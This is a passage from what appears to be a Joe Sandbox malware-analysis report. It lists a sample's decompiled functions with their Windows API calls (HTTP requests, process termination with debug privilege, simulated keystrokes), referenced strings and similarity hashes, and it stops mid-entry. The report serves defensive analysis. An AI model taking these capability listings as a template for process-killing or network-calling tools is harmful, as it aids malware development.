Part of subcall function 00D5C697: GetWindowRect.USER32(?,?), ref: 00D5C701
Part of subcall function 00D5C697: ScreenToClient.USER32(?,?), ref: 00D5C729

GetDC.USER32 ref: 00DBE006
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DBE019
SelectObject.GDI32(00000000,00000000), ref: 00DBE027
SelectObject.GDI32(00000000,00000000), ref: 00DBE03C
ReleaseDC.USER32(?,00000000), ref: 00DBE044
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DBE0CF

Strings

U, xrefs: 00DBDFA4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 5d64575378ebd3bb725385c51ff2a408542cc9e4b5c553eb4cf38b6eb779d433
Instruction ID: 6acb085641083bfedffecc36d729463b87fb51cab44efb218750067503e48360
Opcode Fuzzy Hash: 5d64575378ebd3bb725385c51ff2a408542cc9e4b5c553eb4cf38b6eb779d433
Instruction Fuzzy Hash: 1571DF31400209EFCF219F64CC80AEA7BB6FF49351F184269ED969B2A6D731C885DB71

Function 00D94C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D94C5E
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00D94C8A
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00D94CCC
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00D94CE1
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D94CEE
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00D94D1E
InternetCloseHandle.WININET(00000000), ref: 00D94D65

Part of subcall function 00D956A9: GetLastError.KERNEL32(?,?,00D94A2B,00000000,00000000,00000001), ref: 00D956BE

Strings

, xrefs: 00D94D17

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 85e5bbd383633b084f195b4c07f362b149d3e65d1ed7004978a77bdd26d5fc55
Instruction ID: 6fedf22ece58ab35921ff8dc76d83842d6d13a5edd850ffb478e7a5a58df796a
Opcode Fuzzy Hash: 85e5bbd383633b084f195b4c07f362b149d3e65d1ed7004978a77bdd26d5fc55
Instruction Fuzzy Hash: 77417EB5501619BFEF129FA0CC89FBB77ADEF08314F14412AFA019A196D7B099458BB0

Function 00D9BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00DDDBF0), ref: 00D9BBA1
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00DDDBF0), ref: 00D9BBD5
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D9BD33
SysFreeString.OLEAUT32(?), ref: 00D9BD5D
StringFromGUID2.COMBASE(?,?,00000028), ref: 00D9BEAD
ProgIDFromCLSID.COMBASE(?,?), ref: 00D9BEF7
CoTaskMemFree.COMBASE(?), ref: 00D9BF14

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
String ID:
API String ID: 793797124-0
Opcode ID: 0c3f9e5f9e6935b657dd5419334d893e46ed54fac5bb9da4eaef2501a523a553
Instruction ID: d6247ed3e769d379cda6e212304e912734bd7f98060e9a47786fdff2e0e10812
Opcode Fuzzy Hash: 0c3f9e5f9e6935b657dd5419334d893e46ed54fac5bb9da4eaef2501a523a553
Instruction Fuzzy Hash: 48F12975A00209EFCF14DFA4D984EAEB7BAFF89314F158459F905AB250DB31AE41CB60

Function 00D5B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D449CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D44954,00000000), ref: 00D44A23

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D5B85B), ref: 00D5B926
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00D5B85B,00000000,?,?,00D5AF1E,?,?), ref: 00D5B9BD
DestroyAcceleratorTable.USER32(00000000), ref: 00DBE775
DeleteObject.GDI32(00000000), ref: 00DBE7EB

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 79e4b5acf585468cd914d0e2a1809a088a3a18878156d1f985ffb2f3d8e62d3c
Instruction ID: 6c1ac8a8bddf4a8fa4aae801d0c79b1bfe45e21c79d7503d77636e52334756d7
Opcode Fuzzy Hash: 79e4b5acf585468cd914d0e2a1809a088a3a18878156d1f985ffb2f3d8e62d3c
Instruction Fuzzy Hash: 5961AC34100B02CFDB259F16D888B65BBF5FF85322F18452AE9869B660C771E988DF70

Function 00DAB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DAB204

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: a19030407b761cb0fa9ff68b9ba98d0025227b4438f5ce21a16cb35e880874a1
Instruction ID: ebd7040ab352fedceb32ea7e25ced504753bd3da733dd0cf3e20fa3b41f39dbf
Opcode Fuzzy Hash: a19030407b761cb0fa9ff68b9ba98d0025227b4438f5ce21a16cb35e880874a1
Instruction Fuzzy Hash: BD518E30600305BEEF249B298C99F9E3B65EB07374F244113F955EA2A2C771E992CB70

Function 00D5A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00DBE9EA
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DBEA0B
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DBEA20
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00DBEA3D
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DBEA64
DestroyCursor.USER32(00000000), ref: 00DBEA6F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DBEA8C
DestroyCursor.USER32(00000000), ref: 00DBEA97

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: 84ed09f0c045257c8d04e4c13c4dece51597c99c87a9c810955c71f13eebf251
Instruction ID: ab07293143d619ada07b817e317c2301be5df4d905bd75b79b5e54f032d48c1d
Opcode Fuzzy Hash: 84ed09f0c045257c8d04e4c13c4dece51597c99c87a9c810955c71f13eebf251
Instruction Fuzzy Hash: B0518770600709EFDF24CF69CC81FAA7BA9AB08751F144229F9469B290D770ED849B70

Function 00D5F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00DBE9A0,00000004,00000000,00000000), ref: 00D5F737
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00DBE9A0,00000004,00000000,00000000), ref: 00D5F77E
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00DBE9A0,00000004,00000000,00000000), ref: 00DBEB55
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00DBE9A0,00000004,00000000,00000000), ref: 00DBEBC1

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 36bec507e48350d67a9bf8c4d0c845db19a655c2a19ea317aafed8e349b6b8d9
Instruction ID: ef4977db4ef77cc8c91aa258efb9a5746bfedfbdac23e93e4b678d778f4f3bc2
Opcode Fuzzy Hash: 36bec507e48350d67a9bf8c4d0c845db19a655c2a19ea317aafed8e349b6b8d9
Instruction Fuzzy Hash: 8341C531204781DBDF3557288CC8BAA7B96AB49307F2C086DFC878B561C670E889D735

Function 00D7CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D7E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7E158
Part of subcall function 00D7E138: GetCurrentThreadId.KERNEL32 ref: 00D7E15F
Part of subcall function 00D7E138: AttachThreadInput.USER32(00000000,?,00D7CDFB,?,00000001), ref: 00D7E166

MapVirtualKeyW.USER32(00000025,00000000), ref: 00D7CE06
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D7CE23
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00D7CE26
MapVirtualKeyW.USER32(00000025,00000000), ref: 00D7CE2F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D7CE4D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D7CE50
MapVirtualKeyW.USER32(00000025,00000000), ref: 00D7CE59
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D7CE70
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D7CE73

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 4c27f3c2d53ff99de4f3ae458082e968f690cf1f090c0bd1c3379e99770813ee
Instruction ID: dfda2afd26147a6d8ca7e80b4caf5fc8a3c800060e0a55605cee99954f5b06a1
Opcode Fuzzy Hash: 4c27f3c2d53ff99de4f3ae458082e968f690cf1f090c0bd1c3379e99770813ee
Instruction Fuzzy Hash: 7011E1B1550B1ABEF7102B608C8EF6A3B2EDB1C754F510429F244AB1E0C9F26C00DEB4

Function 00D9C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00D7A857: CLSIDFromProgID.COMBASE ref: 00D7A874
Part of subcall function 00D7A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00D7A88F
Part of subcall function 00D7A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00D7A89D
Part of subcall function 00D7A857: CoTaskMemFree.COMBASE(00000000), ref: 00D7A8AD

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00D9C6AD
_memset.LIBCMT ref: 00D9C6BA
_memset.LIBCMT ref: 00D9C7D8
CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00D9C804
CoTaskMemFree.COMBASE(?), ref: 00D9C80F

Strings

NULL Pointer assignment, xrefs: 00D9C85D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: f1d0374cb8faa141b45a8061c9d95b4c36e446f840467b3d5164ac17818af950
Instruction ID: 02b7d271c66247fa8d190e234dc1b4ef3e33633071ce111784aff555793d56d9
Opcode Fuzzy Hash: f1d0374cb8faa141b45a8061c9d95b4c36e446f840467b3d5164ac17818af950
Instruction Fuzzy Hash: 3F912671D00219ABDF10DFA4DC81EDEBBB9EF08710F20816AE519A7291EB705A45CFB0

Function 00DA9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DA9926
SendMessageW.USER32(?,00001036,00000000,?), ref: 00DA993A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DA9954
_wcscat.LIBCMT ref: 00DA99AF
SendMessageW.USER32(?,00001057,00000000,?), ref: 00DA99C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DA99F4

Strings

SysListView32, xrefs: 00DA98F8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: a58bb3c408b00e0fc4ec5d06ff2ae656bc95c067d8e0cf1647c27bc784894cd3
Instruction ID: 936de8fd06efd4b603b2e87972314d6ddc9926b7d3590933315f7c8bc9b33b4c
Opcode Fuzzy Hash: a58bb3c408b00e0fc4ec5d06ff2ae656bc95c067d8e0cf1647c27bc784894cd3
Instruction Fuzzy Hash: B241BD71A00309AFEF219FA4CC85FEEB7A8EF09354F14442AF589E7291D2759984CB70

Function 00DA1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00D86F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D86F7D
Part of subcall function 00D86F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00D86F8D
Part of subcall function 00D86F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00D87022

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DA168B
GetLastError.KERNEL32 ref: 00DA169E
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DA16CA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00DA1746
GetLastError.KERNEL32(00000000), ref: 00DA1751
CloseHandle.KERNEL32(00000000), ref: 00DA1786

Strings

SeDebugPrivilege, xrefs: 00DA16A9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: cacb5a78d985fe20dd228c5ce21c2fbaded6bd4ee461928216e9847ac43ec2f4
Instruction ID: c099933727f55e424aafe4c33937cb3001fa9366216378682d0ff6d9f7073d26
Opcode Fuzzy Hash: cacb5a78d985fe20dd228c5ce21c2fbaded6bd4ee461928216e9847ac43ec2f4
Instruction Fuzzy Hash: E4418875600202AFDB04EF54CCA5F6DB7A6EF45755F088059F9069F2D2EB74E8088B71

Function 00D86237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00D862D6

Strings

stop, xrefs: 00D862A7
blank, xrefs: 00D86258
question, xrefs: 00D8628F
info, xrefs: 00D86277
warning, xrefs: 00D862BF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 32722a8c479ffbb4b2a9ba85e7f15f06f9ab4aa5c2693827b68de0fc7bc5be95
Instruction ID: 40b23e5dec289831daa03c389201e15ecbc59580c5eb658e20083e2366c54166
Opcode Fuzzy Hash: 32722a8c479ffbb4b2a9ba85e7f15f06f9ab4aa5c2693827b68de0fc7bc5be95
Instruction Fuzzy Hash: CA11B735209357BFD7057B589C42FBA739CDF16774B25006AF641A6282E7E0EA40837C

Function 00D8757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00D87595
LoadStringW.USER32(00000000), ref: 00D8759C
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D875B2
LoadStringW.USER32(00000000), ref: 00D875B9
_wprintf.LIBCMT ref: 00D875DF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D875FD

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00D875DA

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 494e9eafe42f6da52a76367fcc2bf012f877236ae85c8770d0500a850c60370a
Instruction ID: 3ac59ae8a4c962f6bc42357f4d7005711ca14df4d01a5c7ae7f08a4a551af97a
Opcode Fuzzy Hash: 494e9eafe42f6da52a76367fcc2bf012f877236ae85c8770d0500a850c60370a
Instruction Fuzzy Hash: 0A0162F254030ABFEB11E7A49C89EE7776CD704300F0004A2B745E2141EA749E848B30

Function 00DA2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

